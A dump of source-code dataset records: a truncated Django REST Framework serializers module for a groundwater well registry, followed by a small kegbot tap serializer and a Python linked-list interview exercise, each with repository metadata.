well_class = serializers.ReadOnlyField(source='well_class.description')
well_subclass = serializers.ReadOnlyField(source='well_subclass.description')
intended_water_use = serializers.ReadOnlyField(source='intended_water_use.description')
well_status = serializers.ReadOnlyField(source='well_status.description')
well_publication_status = serializers.ReadOnlyField(source='well_publication_status.description')
licenced_status = serializers.ReadOnlyField(source='licenced_status.description')
coordinate_acquisition_code = serializers.ReadOnlyField(source='coordinate_acquisition_code.description')
intended_water_use = serializers.ReadOnlyField(source='intended_water_use.description')
ground_elevation_method = serializers.ReadOnlyField(source='ground_elevation_method.description')
surface_seal_material = serializers.ReadOnlyField(source='surface_seal_material.description')
surface_seal_method = serializers.ReadOnlyField(source='surface_seal_method.description')
liner_material = serializers.ReadOnlyField(source='liner_material.description')
screen_intake_method = serializers.ReadOnlyField(source='screen_intake_method.description')
screen_type = serializers.ReadOnlyField(source='screen_type.description')
screen_material = serializers.ReadOnlyField(source='screen_material.description')
screen_opening = serializers.ReadOnlyField(source='screen_opening.description')
screen_bottom = serializers.ReadOnlyField(source='screen_bottom.description')
alternative_specs_submitted = serializers.ReadOnlyField(source='get_alternative_specs_submitted_display')
drilling_company = serializers.ReadOnlyField(source='company_of_person_responsible.org_guid')
company_of_person_responsible = serializers.ReadOnlyField(source='company_of_person_responsible.org_guid')
submission_work_dates = serializers.SerializerMethodField()
legal_pid = serializers.SerializerMethodField()
is_published = serializers.SerializerMethodField()
def get_legal_pid(self, instance):
if instance.legal_pid is None:
return instance.legal_pid
return "{0:0>9}".format(instance.legal_pid)
def get_submission_work_dates(self, instance):
records = instance.activitysubmission_set \
.exclude(well_activity_type='STAFF_EDIT') \
.order_by('create_date')
records = sorted(records, key=lambda record:
(record.well_activity_type.code != WellActivityCode.types.legacy().code,
record.well_activity_type.code != WellActivityCode.types.construction().code,
record.create_date), reverse=True)
return SubmissionWorkDatesByWellSerializer(records, many=True).data
def get_is_published(self, instance):
return instance.well_publication_status.well_publication_status_code == 'Published'
class Meta:
ref_name = "well_detail_v1"
model = Well
fields = (
"well_guid",
"well",
"well_tag_number",
"identification_plate_number",
"owner_full_name",
# "owner_mailing_address", # temporarily disabled - required for staff, hidden for public
# "owner_city",
# "owner_province_state",
# "owner_postal_code",
"well_class",
"well_subclass",
"intended_water_use",
"well_status",
"well_publication_status",
"licenced_status",
"street_address",
"city",
"legal_lot",
"legal_plan",
"legal_district_lot",
"legal_block",
"legal_section",
"legal_township",
"legal_range",
"land_district",
"legal_pid",
"well_location_description",
"construction_start_date",
"construction_end_date",
"alteration_start_date",
"alteration_end_date",
"decommission_start_date",
"decommission_end_date",
"person_responsible",
"driller_name",
"drilling_company", # old name for company_of_person_responsible
"company_of_person_responsible",
"consultant_name",
"consultant_company",
"well_identification_plate_attached",
"id_plate_attached_by",
"water_supply_system_name",
"water_supply_system_well_name",
"latitude",
"longitude",
"coordinate_acquisition_code",
"ground_elevation",
"ground_elevation_method",
"drilling_methods",
"well_orientation_status",
"surface_seal_material",
"surface_seal_thickness",
"surface_seal_method",
"surface_seal_depth",
"backfill_type",
"backfill_depth",
"liner_material",
"liner_diameter",
"liner_thickness",
"liner_from",
"liner_to",
"screen_intake_method",
"screen_type",
"screen_material",
"other_screen_material",
"screen_opening",
"screen_bottom",
"other_screen_bottom",
"screen_information",
"filter_pack_from",
"filter_pack_to",
"filter_pack_thickness",
"filter_pack_material",
"filter_pack_material_size",
"development_methods",
"development_hours",
"development_notes",
"water_quality_characteristics",
"water_quality_colour",
"water_quality_odour",
"total_depth_drilled",
"finished_well_depth",
"final_casing_stick_up",
"bedrock_depth",
"water_supply_system_name",
"water_supply_system_well_name",
"static_water_level",
"well_yield",
"artesian_flow",
"artesian_pressure",
"artesian_pressure_head",
"artesian_conditions",
"well_cap_type",
"well_disinfected_status",
"comments",
"alternative_specs_submitted",
"well_yield_unit",
"diameter",
"observation_well_number",
"observation_well_status",
"ems",
"aquifer",
"utm_zone_code",
"utm_northing",
"utm_easting",
"bcgs_id",
"decommission_reason",
"decommission_method",
"decommission_sealant_material",
"decommission_backfill_material",
"decommission_details",
"aquifer_vulnerability_index",
"aquifer_lithology",
"storativity",
"transmissivity",
"hydraulic_conductivity",
"specific_storage",
"specific_yield",
"testing_method",
"testing_duration",
"analytic_solution_type",
"boundary_effect",
"yield_estimation_method",
"yield_estimation_rate",
"yield_estimation_duration",
"well_yield_unit",
"static_level_before_test",
"drawdown",
"hydro_fracturing_performed",
"hydro_fracturing_yield_increase",
"recommended_pump_depth",
"recommended_pump_rate",
"casing_set",
"screen_set",
"linerperforation_set",
"decommission_description_set",
"lithologydescription_set",
"submission_work_dates",
"is_published",
)
class SubmissionReportsByWellSerializer(serializers.ModelSerializer):
""" serializes a list of submission reports for a given well, with basic info about each report """
well_activity_description = serializers.ReadOnlyField(
source='well_activity_type.description')
class Meta:
model = ActivitySubmission
fields = ("well", "well_activity_type", "create_user",
"create_date", "well_activity_description", "filing_number")
class SubmissionWorkDatesByWellSerializer(serializers.ModelSerializer):
""" serializes a list of submission report work done information """
well_activity_description = serializers.ReadOnlyField(
source='well_activity_type.description')
drilling_company = serializers.ReadOnlyField(
source='company_of_person_responsible.name')
class Meta:
model = ActivitySubmission
fields = ("well", "create_date", "well_activity_description",
"work_start_date", "work_end_date", "drilling_company")
class WellDetailAdminSerializer(AuditModelSerializer):
casing_set = CasingSerializer(many=True)
screen_set = ScreenSerializer(many=True)
linerperforation_set = LinerPerforationSerializer(many=True)
decommission_description_set = DecommissionDescriptionSerializer(many=True)
person_responsible = PersonNameSerializer()
company_of_person_responsible = OrganizationNameListSerializer()
lithologydescription_set = LithologyDescriptionSerializer(many=True)
submission_reports = serializers.SerializerMethodField()
# well vs. well_tag_number ; on submissions, we refer to well
well = serializers.IntegerField(source='well_tag_number')
legal_pid = serializers.SerializerMethodField()
is_published = serializers.SerializerMethodField()
class Meta:
model = Well
fields = '__all__'
extra_fields = ['latitude', 'longitude']
def get_legal_pid(self, instance):
if instance.legal_pid is None:
return instance.legal_pid
return "{0:0>9}".format(instance.legal_pid)
# this allows us to call model methods on top of __all__
def get_field_names(self, declared_fields, info):
expanded_fields = super(WellDetailAdminSerializer, self).get_field_names(declared_fields, info)
if getattr(self.Meta, 'extra_fields', None):
return expanded_fields + self.Meta.extra_fields
else:
return expanded_fields
def get_submission_reports(self, instance):
records = instance.activitysubmission_set \
.exclude(well_activity_type='STAFF_EDIT') \
.order_by('create_date')
records = sorted(records, key=lambda record:
(record.well_activity_type.code != WellActivityCode.types.legacy().code,
record.well_activity_type.code != WellActivityCode.types.construction().code,
record.create_date), reverse=True)
return SubmissionReportsByWellSerializer(records, many=True).data
def get_is_published(self, instance):
return instance.well_publication_status.well_publication_status_code == 'Published'
class WellStackerSerializer(AuditModelSerializer):
casing_set = CasingStackerSerializer(many=True)
screen_set = ScreenStackerSerializer(many=True)
linerperforation_set = LinerPerforationStackerSerializer(many=True)
decommission_description_set = DecommissionDescriptionStackerSerializer(many=True)
lithologydescription_set = LithologyDescriptionStackerSerializer(many=True)
# Audit fields have to be added explicitly, because they are on a base class
update_user = serializers.CharField(required=True)
create_user = serializers.CharField(required=True)
update_date = serializers.DateTimeField()
class Meta:
model = Well
fields = '__all__'
@transaction.atomic
def update(self, instance, validated_data):
# If there is existing related data, the easiest approach is to drop it, and re-create many to
# many fields based on this update. Trying to match up individual records and updating them,
# dealing with removed casing/screen/perforation records etc. etc. is not the responsibility
# of this section. The composite section is responsible for that.
FOREIGN_KEYS = {
'casing_set': Casing,
'screen_set': Screen,
'linerperforation_set': LinerPerforation,
'decommission_description_set': DecommissionDescription,
'lithologydescription_set': LithologyDescription,
}
for key in FOREIGN_KEYS.keys():
# Is the field one to many, or many to many?
model = type(self).Meta.model
field = model._meta.get_field(key)
records_data = validated_data.pop(key, None)
foreign_class = FOREIGN_KEYS[key]
if field.one_to_many:
# We just delete the one to many records. It would be too complicated to match them up.
for record in getattr(instance, key).all():
record.delete()
if records_data:
for record_data in records_data:
# We're re-creating this record, and binding it to the current instance, so we need
# to get rid of any redundant/duplicate reference that may exist in the record data
# in order to avoid duplications. (the well we pop, should be the same as the instance
# variable)
record_data.pop('well', None)
# Create new instance of of the casing/screen/whatever record.
obj = foreign_class.objects.create(
well=instance, **record_data)
else:
raise 'UNEXPECTED FIELD! {}'.format(field)
instance = super().update(instance, validated_data)
return instance
class WellListSerializerV1(serializers.ModelSerializer):
"""Serializes a well record"""
legal_pid = serializers.SerializerMethodField()
drilling_company = serializers.ReadOnlyField(
source='company_of_person_responsible.org_guid')
company_of_person_responsible = serializers.ReadOnlyField(
source='company_of_person_responsible.org_guid')
licenced_status = serializers.ReadOnlyField(source='licenced_status.licenced_status_code')
def get_legal_pid(self, instance):
if instance.legal_pid is None:
return instance.legal_pid
return "{0:0>9}".format(instance.legal_pid)
class Meta:
model = Well
fields = (
"well_guid",
"well_tag_number",
"identification_plate_number",
"owner_full_name",
"well_class",
"well_subclass",
"well_status",
"licenced_status",
"street_address",
"city",
"legal_lot",
"legal_plan",
"legal_district_lot",
"legal_block",
"legal_section",
"legal_township",
"legal_range",
"land_district",
"legal_pid",
"well_location_description",
"construction_start_date",
"construction_end_date",
"alteration_start_date",
"alteration_end_date",
"decommission_start_date",
"decommission_end_date",
"drilling_company", # old name of company_of_person_responsible
"company_of_person_responsible",
"well_identification_plate_attached",
"id_plate_attached_by",
"water_supply_system_name",
"water_supply_system_well_name",
"latitude",
"longitude",
"coordinate_acquisition_code",
"ground_elevation",
"ground_elevation_method",
"drilling_methods",
"well_orientation_status",
"surface_seal_material",
"surface_seal_thickness",
"surface_seal_method",
"surface_seal_depth",
"backfill_type",
"backfill_depth",
"liner_material",
"liner_diameter",
"liner_thickness",
"liner_from",
"liner_to",
"screen_intake_method",
"screen_type",
"screen_material",
"other_screen_material",
"screen_opening",
"screen_bottom",
"other_screen_bottom",
"screen_information",
"filter_pack_from",
"filter_pack_to",
"filter_pack_thickness",
"filter_pack_material",
"filter_pack_material_size",
"development_methods",
"development_hours",
"development_notes",
"yield_estimation_method",
"yield_estimation_rate",
"yield_estimation_duration",
"well_yield_unit",
"static_level_before_test",
"drawdown",
"hydro_fracturing_performed",
"hydro_fracturing_yield_increase",
"recommended_pump_depth",
"recommended_pump_rate",
"water_quality_characteristics",
"water_quality_colour",
"water_quality_odour",
"total_depth_drilled",
"finished_well_depth",
"well_yield",
"diameter",
"observation_well_number",
"observation_well_status",
"ems",
"aquifer",
"utm_zone_code",
"utm_northing",
"utm_easting",
"bcgs_id",
"decommission_reason",
"decommission_method",
"decommission_sealant_material",
"decommission_backfill_material",
"decommission_details",
"aquifer_vulnerability_index",
"aquifer_lithology",
"storativity",
"transmissivity",
"hydraulic_conductivity",
"specific_storage",
"specific_yield",
"testing_method",
"testing_duration",
"analytic_solution_type",
"boundary_effect",
"final_casing_stick_up",
"bedrock_depth",
"artesian_flow",
"artesian_pressure",
"artesian_pressure_head",
"artesian_conditions",
"well_cap_type",
"well_disinfected_status",
"static_water_level",
)
class WellListAdminSerializerV1(WellListSerializerV1):
class Meta:
model = Well
fields = WellListSerializerV1.Meta.fields + (
'create_user',
'create_date',
'update_user',
'update_date',
'well_publication_status',
'owner_mailing_address',
'owner_city',
'owner_province_state',
'owner_postal_code',
'internal_comments',
)
class WellExportSerializerV1(WellListSerializerV1):
"""Serializes a well for export (using display names for codes, etc)"""
well_class = serializers.SlugRelatedField(read_only=True, slug_field='description')
well_subclass = serializers.SlugRelatedField(read_only=True, slug_field='description')
well_status = serializers.SlugRelatedField(read_only=True, slug_field='description')
licenced_status = serializers.SlugRelatedField(read_only=True, slug_field='description')
land_district = serializers.SlugRelatedField(read_only=True, slug_field='name')
drilling_company = serializers.CharField(read_only=True, source='company_of_person_responsible.name')
ground_elevation_method = serializers.SlugRelatedField(read_only=True,
slug_field='description')
surface_seal_material = serializers.SlugRelatedField(read_only=True, slug_field='description')
surface_seal_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
liner_material = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_intake_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_type = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_material = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_opening = serializers.SlugRelatedField(read_only=True, slug_field='description')
screen_bottom = serializers.SlugRelatedField(read_only=True, slug_field='description')
well_yield_unit = serializers.SlugRelatedField(read_only=True, slug_field='description')
observation_well_status = serializers.SlugRelatedField(read_only=True, slug_field='description')
coordinate_acquisition_code = serializers.SlugRelatedField(read_only=True,
slug_field='description')
bcgs_id = serializers.SlugRelatedField(read_only=True, slug_field='bcgs_number')
decommission_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
aquifer = serializers.PrimaryKeyRelatedField(read_only=True)
aquifer_lithology = serializers.SlugRelatedField(read_only=True, slug_field='description')
yield_estimation_method = serializers.SlugRelatedField(read_only=True, slug_field='description')
development_methods = serializers.SlugRelatedField(many=True, read_only=True,
slug_field='description')
drilling_methods = serializers.SlugRelatedField(many=True, read_only=True,
slug_field='description')
water_quality_characteristics = serializers.SlugRelatedField(many=True, read_only=True,
slug_field='description')
hydro_fracturing_performed = serializers.CharField(read_only=True,
source='get_hydro_fracturing_performed_display')
m2m_relations = {
field.name
for field in Well._meta.get_fields()
if field.many_to_many and not field.auto_created
}
def __init__(self, *args, **kwargs):
"""
Limit responses to requested fields
If we get a 'fields' context kwarg, then limit results to the included
fields.
"""
super().__init__(*args, **kwargs)
context = kwargs.get('context', {})
fields = context.get('fields', None)
if fields is not None:
excluded_fields = set(self.fields) - set(fields)
for field_name in excluded_fields:
self.fields.pop(field_name)
def to_representation(self, instance):
"""
Instead of arrays, return comma delimited strings for export.
"""
data = super().to_representation(instance)
for field_name in self.m2m_relations:
if field_name in data:
data[field_name] = ','.join(data[field_name])
return data
class WellExportAdminSerializerV1(WellExportSerializerV1):
"""Serializes a well for export (using display names for codes, etc)"""
owner_province_state = serializers.SlugRelatedField(read_only=True,
slug_field='description')
well_publication_status = serializers.SlugRelatedField(read_only=True,
slug_field='description')
class Meta:
model = Well
fields = WellListAdminSerializerV1.Meta.fields
class WellTagSearchSerializer(serializers.ModelSerializer):
""" serializes fields used for searching for well tags """
class Meta:
model = Well
fields = ("well_tag_number", "owner_full_name")
class WellLocationSerializerV1(serializers.ModelSerializer):
""" serializes well locations v1 """
class Meta:
model = Well
fields = ("well_tag_number", "identification_plate_number",
"latitude", "longitude", "street_address", "city")
class WellDrawdownSerializer(serializers.ModelSerializer):
screen_set = ScreenSerializer(many=True)
intended_water_use = serializers.ReadOnlyField(source='intended_water_use.description')
aquifer_subtype = serializers.ReadOnlyField(source='aquifer.subtype.description')
distance = serializers.FloatField(required=False)
class Meta:
model = Well
fields = (
"well_tag_number",
"static_water_level",
"screen_set",
"well_yield",
"diameter",
"aquifer",
"distance",
"latitude",
"longitude",
"well_yield_unit",
"finished_well_depth",
"street_address",
"intended_water_use",
"aquifer_subtype"
)
def to_representation(self, instance):
details = super().to_representation(instance)
if instance.aquifer and instance.aquifer.subtype:
details['aquifer_hydraulically_connected'] = instance.aquifer.subtype.code in HYDRAULIC_SUBTYPES
return details
class WellLithologySerializer(serializers.ModelSerializer):
lithologydescription_set = LithologyDescriptionSummarySerializer(many=True)
class Meta:
model = Well
fields = (
"well_tag_number",
"latitude",
"longitude",
"lithologydescription_set"
)
| 37.166964 | 110 | 0.622913 |
35a24584770ba0397dfffef5db85c19ae8e1cdec | 327 | py | Python | kegbot/serializers.py | jsatt/kegbot | 9d721db250b1363e53b24ae1ffee619cd8a5d09a | [
"MIT"
] | null | null | null | kegbot/serializers.py | jsatt/kegbot | 9d721db250b1363e53b24ae1ffee619cd8a5d09a | [
"MIT"
] | null | null | null | kegbot/serializers.py | jsatt/kegbot | 9d721db250b1363e53b24ae1ffee619cd8a5d09a | [
"MIT"
] | null | null | null | from rest_framework.serializers import ModelSerializer
from .models import Tap
class TapSerializer(ModelSerializer):
class Meta:
model = Tap
fields = (
'id', 'channel', 'pulses_per_ml', 'current_level', 'total_ml',
'dispensed_ml', 'beverage', 'pours',
)
depth = 1
| 23.357143 | 74 | 0.608563 |
719e752b9a39dd0362ef4c73f7a54ad04ad881a4 | 1,240 | py | Python | python/interview_questions/remove_nth_node_from_linked_list.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | python/interview_questions/remove_nth_node_from_linked_list.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | python/interview_questions/remove_nth_node_from_linked_list.py | rcanepa/cs-fundamentals | b362fc206417501e53a5739df1edf7568901eef8 | [
"MIT"
] | null | null | null | """Given a linked list, remove the nth node from the end of list and return its head.
For example,
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
Try to do this in one pass.
"""
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
def remove_nth_from_end(head, n):
ptr0 = head
ptr1 = head
ptr2 = head
ptr2_steps = 0
while ptr2.next:
ptr2 = ptr2.next
ptr2_steps += 1
if ptr2_steps >= n:
ptr0 = ptr1
ptr1 = ptr1.next
ptr0.next = ptr1.next
if ptr0 == ptr1:
head = head.next
return head
if __name__ == "__main__":
n = 2
head = ListNode(1)
head.next = ListNode(2)
head.next.next = ListNode(3)
head.next.next.next = ListNode(4)
head.next.next.next.next = ListNode(5)
source = []
ptr = head
while ptr:
source.append(ptr.val)
ptr = ptr.next
print(source)
head = remove_nth_from_end(head, n)
ptr = head
result = []
while ptr:
result.append(ptr.val)
ptr = ptr.next
print(result)
| 18.787879 | 85 | 0.575 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.